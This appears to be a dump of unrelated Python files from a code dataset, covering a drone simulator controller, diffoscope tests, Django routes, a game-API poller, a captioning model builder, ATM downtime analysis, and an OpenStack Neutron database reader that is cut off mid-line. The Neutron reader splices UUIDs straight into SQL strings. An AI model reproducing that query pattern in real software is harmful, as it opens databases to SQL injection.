Direction degree with north as reference\n self.compass = drone_node.getDevice(\"compass\")\n self.compass.enable(timestep)\n\n # Video acquisition\n fps = 25\n self.camera = drone_node.getDevice(\"camera\")\n self.camera_rate = 1000 // fps\n self.camera.enable(self.camera_rate)\n\n # LEDS\n self.leds = [\n drone_node.getDevice(\"front left led\"),\n drone_node.getDevice(\"front right led\")\n ]\n\n # Gimbal\n self.camera_roll = drone_node.getDevice(\"camera roll\")\n self.camera_pitch = drone_node.getDevice(\"camera pitch\")\n\n # Motors\n self.motors_id = ['front left propeller',\n 'front right propeller',\n 'rear left propeller',\n 'rear right propeller']\n self.motors = list()\n for mid in self.motors_id:\n motor = drone_node.getDevice(mid)\n motor.setPosition(float('inf'))\n motor.setVelocity(1.)\n self.motors.append(motor)\n\n return True\n\n def blink_leds(self):\n \"\"\"Blink the LED nodes.\"\"\"\n led_state = int(self.time_counter) % 2\n self.leds[0].set(led_state)\n self.leds[1].set(int(not led_state))\n\n def gimbal_stabilize(self):\n \"\"\"Stabilize camera (gimbal).\"\"\"\n acceleration = self.gyro.getValues()\n self.camera_roll.setPosition(-0.115 * acceleration[0])\n self.camera_pitch.setPosition(-0.1 * acceleration[1])\n\n def get_odometry(self):\n \"\"\"Get the drone's current acceleration, angles and position.\"\"\"\n orientation = self.imu.getRollPitchYaw()\n angular_velocity = self.gyro.getValues()\n position = self.gps.getValues()\n speed = self.gps.getSpeedVector()\n compass = self.compass.getValues()\n north_rad = np.arctan2(compass[0], compass[1])\n\n return orientation, angular_velocity, position, speed, north_rad\n\n def get_image(self):\n \"\"\"Get the Camera node image with size and channels.\n\n :return the data image with BGRA values\n \"\"\"\n camera_image = None\n if self.camera.getImage():\n camera_image = bytes2image(self.camera.getImage(),\n self.get_camera_image_shape())\n return camera_image\n\n def get_dist_sensors(self):\n \"\"\"Get the Distance sensors Nodes' measurements.\"\"\"\n sensors = dict()\n for i, sensor_name in enumerate(self.sensors_id):\n dist_sensor = self.sensors[i]\n sensors[sensor_name] = [dist_sensor.getValue(),\n dist_sensor.getMinValue(),\n dist_sensor.getMaxValue()]\n return sensors\n\n def get_camera_image_shape(self):\n \"\"\"Get the camera image dimension and channels.\"\"\"\n return (self.camera.getHeight(), self.camera.getWidth(), 4) # channels\n\n def set_motors_velocity(self, fl_motor, fr_motor, rl_motor, rr_motor):\n \"\"\"Set the drone's motor velocity.\"\"\"\n # Actuate over the motors\n if not np.isnan(fl_motor):\n self.motors[0].setVelocity(self.lift_thrust + fl_motor)\n self.motors[1].setVelocity(-(self.lift_thrust + fr_motor))\n self.motors[2].setVelocity(-(self.lift_thrust + rl_motor))\n self.motors[3].setVelocity(self.lift_thrust + rr_motor)\n","repo_name":"angel-ayala/gym-webots-drone","sub_path":"controllers/drone_controller/drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
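# The compass-to-heading step from get_odometry() in isolation: the Webots
# compass returns a vector pointing toward north, so the heading follows from
# atan2 on its first two components (the sample values below are invented):
import numpy as np

compass = [0.0, 1.0, 0.0]                  # facing straight north
print(np.arctan2(compass[0], compass[1]))  # 0.0 radians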
+{"seq_id":"1001993413","text":"def q1(inputString):\n if len(inputString) < 3:\n print('There is no third largest letter for this input.')\n return\n # track the three largest letters seen so far (case-insensitive)\n currentMaxChar = ''\n currentSecondMaxChar = ''\n currentThirdMaxChar = ''\n for currentChar in inputString:\n c = currentChar.lower()\n if c > currentMaxChar:\n currentThirdMaxChar = currentSecondMaxChar\n currentSecondMaxChar = currentMaxChar\n currentMaxChar = c\n elif c > currentSecondMaxChar:\n currentThirdMaxChar = currentSecondMaxChar\n currentSecondMaxChar = c\n elif c > currentThirdMaxChar:\n currentThirdMaxChar = c\n\n maxLetterCount = 0\n for a in inputString:\n count = 0\n for b in inputString:\n if(a == b):\n count = count + 1\n if(count > maxLetterCount):\n maxLetterCount = count\n repeatLetter = a\n print('In {}, the largest letter is {}, the third largest letter is {}, and the most common letter is {}, occurring {} times.'.format(inputString,currentMaxChar,currentThirdMaxChar,repeatLetter,maxLetterCount))\n return\n","repo_name":"nihaal-gill/Example-Coding-Projects","sub_path":"Working with Strings/Strings.py","file_name":"Strings.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
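# A quick check of the function above; duplicate occurrences count separately,
# so for 'hello' the second and third largest letters are both 'l':
q1('hello')
# In hello, the largest letter is o, the third largest letter is l,
# and the most common letter is l, occurring 2 times.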
+{"seq_id":"28468405102","text":"import os.path\nimport shutil\nimport pytest\nfrom diffoscope.comparators import specialize\nfrom diffoscope.comparators.binary import FilesystemFile, NonExistingFile\ntry:\n from diffoscope.comparators.debian import DotChangesFile, DotDscFile\n miss_debian_module = False\nexcept ImportError:\n from diffoscope.comparators.debian_fallback import DotChangesFile, DotDscFile\n miss_debian_module = True\nfrom diffoscope.config import Config\nfrom diffoscope.presenters.text import output_text\n\nTEST_DOT_CHANGES_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.changes')\nTEST_DOT_CHANGES_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.changes')\nTEST_DEB_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.deb')\nTEST_DEB_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.deb')\n\n@pytest.fixture\ndef dot_changes1(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE1_PATH, str(tmpdir.join('a/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\n@pytest.fixture\ndef dot_changes2(tmpdir):\n tmpdir.mkdir('b')\n dot_changes_path = str(tmpdir.join('b/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE2_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE2_PATH, str(tmpdir.join('b/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\ndef test_dot_changes_identification(dot_changes1):\n assert isinstance(dot_changes1, DotChangesFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_invalid(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n # we don't copy the referenced .deb\n identified = specialize(FilesystemFile(dot_changes_path))\n assert not isinstance(identified, DotChangesFile)\n\ndef test_dot_changes_no_differences(dot_changes1):\n difference = dot_changes1.compare(dot_changes1)\n assert difference is None\n\n@pytest.fixture\ndef dot_changes_differences(dot_changes1, dot_changes2):\n difference = dot_changes1.compare(dot_changes2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_description(dot_changes_differences):\n assert dot_changes_differences[0]\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/dot_changes_description_expected_diff')).read()\n assert dot_changes_differences[0].unified_diff == expected_diff\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_internal_diff(dot_changes_differences):\n assert dot_changes_differences[2].source1 == 'test_1_all.deb'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_compare_non_existing(monkeypatch, dot_changes1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_changes1.compare(NonExistingFile('/nonexisting', dot_changes1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n\nTEST_DOT_DSC_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.dsc')\nTEST_DOT_DSC_FILE2_PATH = os.path.join(os.path.dirname(__file__), 
'../data/test2.dsc')\nTEST_DEB_SRC1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.debsrc.tar.gz')\nTEST_DEB_SRC2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.debsrc.tar.gz')\n\n@pytest.fixture\ndef dot_dsc1(tmpdir):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE1_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC1_PATH, str(tmpdir.join('a/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\n@pytest.fixture\ndef dot_dsc2(tmpdir):\n tmpdir.mkdir('b')\n dot_dsc_path = str(tmpdir.join('b/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE2_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC2_PATH, str(tmpdir.join('b/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\ndef test_dot_dsc_identification(dot_dsc1):\n assert isinstance(dot_dsc1, DotDscFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_invalid(tmpdir, dot_dsc2):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_dsc_path)\n # we don't copy the referenced .tar.gz\n identified = specialize(FilesystemFile(dot_dsc_path))\n assert not isinstance(identified, DotDscFile)\n\ndef test_dot_dsc_no_differences(dot_dsc1):\n difference = dot_dsc1.compare(dot_dsc1)\n assert difference is None\n\n@pytest.fixture\ndef dot_dsc_differences(dot_dsc1, dot_dsc2):\n difference = dot_dsc1.compare(dot_dsc2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_internal_diff(dot_dsc_differences):\n assert dot_dsc_differences[1].source1 == 'test_1.tar.gz'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_compare_non_existing(monkeypatch, dot_dsc1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_dsc1.compare(NonExistingFile('/nonexisting', dot_dsc1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n","repo_name":"edolstra/diffoscope","sub_path":"tests/comparators/test_debian.py","file_name":"test_debian.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"73773737691","text":"\"\"\"multisearch URL Configuration\n\nConfigure URL for endpoints:\n/site/\n/site/:site_id/\n/search/:site_id?term=foo\n\"\"\"\n\n\nfrom django.conf.urls import url\nfrom .views.api import (\n search,\n sites,\n site,\n)\n\n\nurlpatterns = [\n url(r'^search/(?P<site_id>\w+).*$', search, name=\"search\"),\n url(r'^site/$', sites, name=\"sites\"),\n url(r'^site/(?P<site_id>\w+)/$', site, name=\"site\"),\n]","repo_name":"jdeveloperw/multisearch","sub_path":"server/multisearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
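# The named group feeds the matched view as a keyword argument. A minimal sketch
# of a compatible view; the real one lives in .views.api, so this signature is
# an assumption read off the URL pattern and the module docstring:
from django.http import JsonResponse

def search(request, site_id):
    term = request.GET.get('term', '')  # /search/<site_id>?term=foo
    return JsonResponse({'site_id': site_id, 'term': term})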
+{"seq_id":"27298147498","text":"import requests\nimport threading, time\nimport GLOBAL_CONFIG\nDEBUG_LOG = False\n\nAPI_KEY = GLOBAL_CONFIG.API_KEY\nAPI_FACTION_ID = \"36134\"\nAPI_CHAIN_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=chain&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_FACTION_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_REQUEST_TIME_INTERVAL = 5\n\nsession = requests.session()\nif GLOBAL_CONFIG.USE_PROXIES:\n session.proxies = GLOBAL_CONFIG.proxies\n\nfaction_name = \"\"\nchain_current = -1\nchain_max = -1\nchain_timeout = -1\nchain_last_update_timestamp = -1\n\n\ndef debug_log_chain_state():\n if DEBUG_LOG:\n print(chain_current, chain_max, chain_timeout)\n\n\ndef chain_detail_info_make() -> str:\n return 'faction: %s\\n当前chain: %d\\n最大chain: %d\\n剩余时间: %d秒\\n预估剩余时间:%d秒\\n距离上次更新已过去:%d秒' % (faction_name, chain_current, chain_max, chain_timeout, (chain_timeout - (time.time()-chain_last_update_timestamp)), time.time()-chain_last_update_timestamp)\n\n\ndef chain_simple_info_make() -> str:\n return '当前chain: %d\\n最大chain: %d\\n预估剩余时间:%d' % ( chain_current, chain_max, (chain_timeout - (time.time()-chain_last_update_timestamp)))\n\n\ndef update_faction_state():\n global faction_name\n # use the shared session so the proxy settings apply here as well\n r = session.get(API_FACTION_REQUEST_URL).json()\n try:\n faction_name = r[\"name\"]\n except Exception as e:\n faction_name = \"\"\n\n\ndef update_chain_state():\n global chain_current, chain_max, chain_timeout, chain_last_update_timestamp\n r = session.get(API_CHAIN_REQUEST_URL).json()\n try:\n new_chain_current = r[\"chain\"][\"current\"]\n new_chain_max = r[\"chain\"][\"max\"]\n new_chain_timeout = r[\"chain\"][\"timeout\"]\n new_chain_timestamp = -1\n\n if (new_chain_current != chain_current) or (new_chain_max != chain_max) or (new_chain_timeout != chain_timeout):\n # new data: refresh last_update_timestamp\n new_chain_timestamp = time.time()\n else:\n # no new data: keep the previous last_update_timestamp\n new_chain_timestamp = chain_last_update_timestamp\n\n chain_current = new_chain_current\n chain_max = new_chain_max\n chain_timeout = new_chain_timeout\n chain_last_update_timestamp = new_chain_timestamp\n\n except Exception as e:\n chain_current = -1\n chain_max = -1\n chain_timeout = -1\n chain_last_update_timestamp = -1\n\n\ndef api_life_cycle():\n while 1:\n try:\n if faction_name == \"\":\n update_faction_state()\n update_chain_state()\n debug_log_chain_state()\n except Exception as e:\n print(e)\n print('api.center.heartbeat')\n time.sleep(API_REQUEST_TIME_INTERVAL)\n\n\ndef commence_life_cycle():\n # do not call this more than once\n thread = threading.Thread(target=api_life_cycle)\n thread.start()","repo_name":"mirrorsysu/iTorn_source","sub_path":"torn/APICenter.py","file_name":"APICenter.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"11670794425","text":"\"\"\"Model and feature extraction logic.\"\"\"\nfrom omegaconf import DictConfig\nfrom transformers import (GPT2Tokenizer, PreTrainedModel, PreTrainedTokenizer,\n VisionEncoderDecoderModel, ViTFeatureExtractor)\n\n\ndef get_feature_extractor(\n pretrained_feature_extractor: str,\n) -> ViTFeatureExtractor:\n \"\"\"Get a pretrained ViT feature extractor by the given name.\n\n Args:\n pretrained_feature_extractor: The pretrained ft name.\n\n Returns:\n The pretrained feature ViT extractor.\n \"\"\"\n return ViTFeatureExtractor.from_pretrained(\n pretrained_feature_extractor,\n )\n\n\ndef get_tokenizer(\n pretrained_tokenizer: str,\n) -> GPT2Tokenizer:\n \"\"\"Get a pretrained GPT2 tokenizer by the given name.\n\n Args:\n pretrained_tokenizer: The pretrained tokenizer name.\n\n Returns:\n The pretrained GPT2 tokenizer.\n \"\"\"\n tokenizer = GPT2Tokenizer.from_pretrained(\n pretrained_tokenizer, use_fast=True,\n )\n tokens_to_add = {\n 'pad_token': '[PAD]',\n 'bos_token': '[BOS]',\n 'eos_token': '[EOS]',\n }\n tokenizer.add_special_tokens(tokens_to_add)\n return tokenizer\n\n\ndef get_model(\n pretrained_encoder: str,\n pretrained_decoder: str,\n tokenizer: PreTrainedTokenizer,\n config: DictConfig,\n) -> PreTrainedModel:\n \"\"\"Get and configure a pretrained EncoderDecoder model.\n\n Args:\n pretrained_encoder: Pretrained encoder name.\n pretrained_decoder: Pretrained decoder name.\n tokenizer: Pretrained tokenizer for encoder.\n config: Model configuration.\n\n Returns:\n VisionEncoder decoder from pretrained parts with applied configuration.\n \"\"\"\n model = VisionEncoderDecoderModel.from_encoder_decoder_pretrained(\n pretrained_encoder, pretrained_decoder,\n )\n\n model.config.decoder_start_token_id = tokenizer.bos_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n\n model.decoder.resize_token_embeddings(len(tokenizer))\n model.config.vocab_size = model.config.decoder.vocab_size\n\n model.config.max_length = config.max_length\n model.config.num_beams = config.num_beams\n model.config.num_beam_groups = config.num_beam_groups\n model.config.early_stopping = config.early_stopping\n model.config.no_repeat_ngram_size = config.no_repeat_ngram_size\n model.config.length_penalty = config.length_penalty\n model.config.repetition_penalty = config.repetition_penalty\n model.config.diversity_penalty = config.diversity_penalty\n\n return model\n","repo_name":"EgSergeenko/product-images-captioning","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
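# A hedged wiring example for the helpers above. The checkpoint names and the
# config values are illustrative assumptions; in the project they come from its
# omegaconf configuration, which is not shown here.
from omegaconf import OmegaConf

config = OmegaConf.create({
    'max_length': 64, 'num_beams': 4, 'num_beam_groups': 1,
    'early_stopping': True, 'no_repeat_ngram_size': 3,
    'length_penalty': 1.0, 'repetition_penalty': 1.0, 'diversity_penalty': 0.0,
})
tokenizer = get_tokenizer('gpt2')
feature_extractor = get_feature_extractor('google/vit-base-patch16-224-in21k')
model = get_model('google/vit-base-patch16-224-in21k', 'gpt2', tokenizer, config)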
+{"seq_id":"11937636964","text":"import datetime as dt\nimport time as tm\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series\nfrom pandas.core.frame import DataFrame\nfrom progressbar import ProgressBar\n\nimport project.date_range as dr\nfrom project.pd import df_cartesian\nfrom project.pd.datasource.orcl import DataFrameReaderOrcl\nimport project.atmserv.typ as typ\n\n\ndef get_order_day(df_order, df_day):\n df = df_cartesian(df_order, df_day)\n return df.loc[(df.DATE_REG <= df.DAY) & (df.DAY <= df.DATE_END)]\n\n\ndef set_group_func(df, series, col_name, func):\n\n for item in series.unique():\n cond = series == item # Boolean mask for each unique value\n df.loc[cond, col_name] = func(item)\n\n\ndef get_in_repair(df_atm_order):\n i = 0\n in_repair_list = []\n grp_atm_order = df_atm_order.groupby(['ATM_REF', 'DAY', 'SW_BEG', 'SW_END'])[['DATE_REG', 'DATE_END']]\n bar = ProgressBar(max_value=len(grp_atm_order.size())).start()\n for (atm_ref, day, sw_beg, sw_end), grp in grp_atm_order:\n\n i += 1\n in_repair_day = []\n for order in grp.itertuples():\n\n (beg, end) = dr.inner_join([(sw_beg, sw_end), (order.DATE_REG, order.DATE_END)])\n if None not in [beg, end]:\n in_repair_day.append((beg, end))\n\n if i % 100 == 0:\n bar.update(i)\n\n in_repair_list.extend([(atm_ref, day, sw_beg, sw_end, *item) for item in dr.outer_join(in_repair_day) if item is not None])\n\n bar.finish()\n\n df_in_repair = pd.DataFrame(\n in_repair_list,\n columns=['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'REPAIR_BEG', 'REPAIR_END']\n )\n\n # df_in_repair['REPAIR_TIME'] = df_in_repair['REPAIR_END'] - df_in_repair['REPAIR_BEG']\n\n return df_in_repair\n\n\ndef get_service_window(df_atm, df_day):\n\n def time_to_td(time):\n return pd.Timedelta(hours=time.hour, minutes=time.minute)\n\n set_group_func(df_atm, df_atm.A_TIME_BEG, 'TD_SERVICE_BEG', time_to_td) # Timedelta from midnight to the start of service\n set_group_func(df_atm, df_atm.A_TIME_END, 'TD_SERVICE_END', time_to_td) # Timedelta from midnight to the end of service\n\n # Compute the service schedule from the weekday conditions\n df_atm_wd = df_cartesian(df_atm, pd.DataFrame({'WEEKDAY': [1, 2, 3, 4, 5, 6, 7]})) #.set_index(['ATM_REF', 'WEEKDAY'], False)\n cond = df_atm_wd.WEEKDAY > df_atm_wd.A_DAYS\n df_atm_wd.loc[cond, 'TD_SERVICE_BEG'] = pd.to_timedelta(0)\n df_atm_wd.loc[cond, 'TD_SERVICE_END'] = pd.to_timedelta(0)\n\n # The ATM availability schedule reduces to two fields (AVAIL_BEG and AVAIL_END) per weekday\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_BEG'] = df_atm_wd.MON_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_END'] = df_atm_wd.MON_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_BEG'] = df_atm_wd.TUE_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_END'] = df_atm_wd.TUE_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_BEG'] = df_atm_wd.WED_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_END'] = df_atm_wd.WED_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_BEG'] = df_atm_wd.THU_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_END'] = df_atm_wd.THU_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_BEG'] = df_atm_wd.FRI_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_END'] = df_atm_wd.FRI_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_BEG'] = df_atm_wd.SAT_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_END'] = df_atm_wd.SAT_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_BEG'] = df_atm_wd.SUN_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_END'] = df_atm_wd.SUN_END\n\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_BEG, 'TD_AVAIL_BEG', time_to_td)\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_END, 'TD_AVAIL_END', time_to_td)\n\n # Expand the data to one row per day\n # df_atm_sw = pd.merge(df_atm_wd, df_day, 'outer', on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n df_atm_sw = pd.merge(df_atm_wd, df_day, on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n # print(df_atm_sw.info())\n\n # Convert to datetime\n df_atm_sw['SERVICE_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_BEG\n df_atm_sw['SERVICE_END'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_END\n df_atm_sw['AVAIL_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_BEG\n df_atm_sw['AVAIL_END'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_END\n\n # Combine the service and availability windows\n cond = df_atm_sw['AVAIL_BEG'] > df_atm_sw['SERVICE_BEG']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'AVAIL_BEG']\n df_atm_sw.loc[~cond, 'SW_BEG'] = df_atm_sw.loc[~cond, 'SERVICE_BEG']\n\n cond = df_atm_sw['AVAIL_END'] < df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'AVAIL_END']\n df_atm_sw.loc[~cond, 'SW_END'] = df_atm_sw.loc[~cond, 'SERVICE_END']\n\n cond = df_atm_sw['SERVICE_BEG'] >= df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'DAY']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'DAY']\n\n df_atm_sw['SW_TIME'] = df_atm_sw['SW_END'] - df_atm_sw['SW_BEG']\n\n # print(df_atm_sw)\n # df_atm_sw.to_csv('data/df_atm_sw.csv', sep='\\t')\n return df_atm_sw\n\n\ndef calc_idle(reader, date_beg, date_end):\n\n df_atm_all = reader.get_atm()\n df_service = reader.get_service(date_beg, date_end)\n df_order = reader.get_orders(date_beg, date_end)\n\n df_atm = df_service.merge(df_atm_all, on=['ATM_REF']) #.set_index('ATM_REF', False)\n\n # List of dates to analyse\n days = dr.date_list(date_beg, date_end)\n df_day = pd.DataFrame({'DAY':[d for d in days]})\n df_day.DAY = pd.to_datetime(df_day.DAY) # convert to datetime\n df_day['WEEKDAY'] = df_day.DAY.dt.weekday + 1 # reference weekday column\n\n df_atm_sw = get_service_window(df_atm, df_day) # Compute the service window for each ATM\n\n # Compute per-day repair intervals for each ATM\n df_order_day = get_order_day(df_order, df_day)\n df_atm_order = pd.merge(df_atm_sw, df_order_day, on=['ATM_REF', 'DAY']) #.set_index(['ATM_REF', 'DAY'], False)\n df_in_repair = get_in_repair(df_atm_order) # slow operation\n\n # Compute per-day availability for each ATM\n df_idle = pd.merge(\n df_atm_sw[['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'SW_TIME']],\n df_in_repair[['ATM_REF', 'DAY', 'REPAIR_BEG', 'REPAIR_END']],\n how='left',\n on=['ATM_REF', 'DAY']\n )\n df_idle['REPAIR_TIME'] = df_idle['REPAIR_END'] - df_idle['REPAIR_BEG']\n df_idle.loc[df_idle.REPAIR_TIME.isnull() & (df_idle.SW_TIME > pd.to_timedelta(0)), 'REPAIR_TIME'] = pd.to_timedelta(0)\n df_idle['AVAIL'] = 1 - (df_idle['REPAIR_TIME'] / df_idle['SW_TIME'])\n df_idle['DAY_DATE'] = df_idle.DAY.dt.date\n df_idle['DAY_MONTH'] = df_idle.DAY.dt.strftime('%Y.%m')\n df_idle['DAY_NUM'] = df_idle.DAY.dt.day\n\n # print(df_idle.info())\n # df_idle.to_csv('data/df_idle.csv', sep='\\t')\n\n df_atm_idle = df_atm[['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL']].merge(\n df_idle,\n how='left',\n on=['ATM_REF']\n # left_index=True,\n # right_index=True\n )\n\n df_atm_idle_pivot = df_atm_idle.pivot_table(index=['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL'], columns=['DAY_MONTH', 'DAY_NUM'], values=['AVAIL']) #.reset_index() 
#.set_index(['ATM_REF'])\n print(df_atm_idle_pivot)\n\n return df_atm_idle_pivot\n\n","repo_name":"privod/atm_chart","sub_path":"project/idle.py","file_name":"idle.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12395461593","text":"__author__ = 'gpetralia'\n\nimport json\nfrom contextlib import closing\nimport mysql.connector as MySQLdb\n\n# MAP driver name to Neutron agent name\nMAP_DRIVER_BINARY = {\n 'openvswitch': 'neutron-openvswitch-agent'\n}\n\n\nclass NeutronDb():\n \"\"\"\n Exposes methods to get information regarding Neutron resources.\n It manages the connection to the Neutron DB.\n \"\"\"\n def __init__(self, host, usr, pwd, db):\n self.conn = None\n self.conn = MySQLdb.connect(host=host,\n user=usr,\n passwd=pwd,\n db=db)\n\n def get_routers(self, uuid=None):\n \"\"\"\n Return a dict containing the routers stored in Glance.\n If an UUID is given, it will return only the router with the given UUID\n :param uuid: Optional UUID of the desired router\n :return dict: contains routers information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from routers left join ' \\\n 'routerl3agentbindings on routers.id = routerl3agentbindings.router_id'\n\n if uuid:\n query += ' where routers.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'router'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['status'] = row[3]\n res[row[1]]['attributes']['admin_state_up'] = row[4]\n res[row[1]]['attributes']['gw_port_id'] = row[5]\n res[row[1]]['attributes']['enable_snat'] = row[6]\n res[row[1]]['attributes']['l3_agent_id'] = row[8]\n res[row[1]]['attributes']['ports'] = []\n port_query = 'select * from routerports where router_id=\"' + row[1] + '\"'\n cur.execute(port_query)\n for port_row in cur.fetchall():\n res[row[1]]['attributes']['ports'].append(port_row[1])\n\n return res\n\n def get_floating_ips(self, uuid=None):\n \"\"\"\n Return a dict containing the FloatingIPs stored in Neutron.\n If an UUID is given, it will return only the FloatingIP with the given UUID\n :param uuid: Optional UUID of the desired FloatingIP\n :return dict: contains FloatingIPs information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n query = 'select * from floatingips'\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n res[row[1]]['type'] = 'floatingip'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['floating_ip_address'] = row[2]\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['port_id'] = row[4]\n res[row[1]]['attributes']['fixed_port_id'] = row[5]\n res[row[1]]['attributes']['router_id'] = row[7]\n sub_query = 'select mac_address from ports where id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['mac_address'] = sub_row[0]\n sub_query = 'select subnet_id from ipallocations where port_id = 